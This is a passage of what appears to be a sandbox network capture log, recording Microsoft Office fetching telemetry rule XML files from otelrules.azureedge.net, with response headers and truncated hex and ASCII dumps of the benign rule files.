                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:08 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c14dccd-c01e-0079-70d5-33e51a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153708Z-174f7845968nxc96hC1EWRspw800000004y0000000005dy6
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:08 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        96192.168.2.44985613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 55c09f61-d01e-0082-16d5-33e489000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153709Z-174f7845968px8v7hC1EWR08ng00000005dg000000008fvh
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        97192.168.2.44985313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 31c5e564-101e-008d-76d5-3392e5000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153709Z-174f7845968n2hr8hC1EWR9cag00000004t000000000cb7m
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        98192.168.2.44985213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c14dce3-c01e-0079-04d5-33e51a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153709Z-174f7845968cdxdrhC1EWRg0en000000051g00000000kaph
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        99192.168.2.44985513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 3ca8c4c6-201e-0096-0fd5-33ace6000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153709Z-174f7845968xlwnmhC1EWR0sv8000000051000000000585m
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        100192.168.2.44985413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5ac3f5ac-801e-008f-14d5-332c5d000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153709Z-174f7845968l4kp6hC1EWRe884000000058g00000000sfxs
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:09 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        101192.168.2.44986113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                        x-ms-request-id: a04d8451-d01e-00ad-12d5-33e942000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f784596886s2bhC1EWR743w000000056000000000bfu3
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        102192.168.2.44985813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 904e9adf-b01e-003e-62d5-338e41000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968vwdr7hC1EWRsh3w000000054g000000004t15
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        103192.168.2.44985913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:10 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                        x-ms-request-id: ca9795ec-a01e-006f-27d5-3313cd000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153710Z-174f7845968vqt9xhC1EWRgten000000054000000000mbv7
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
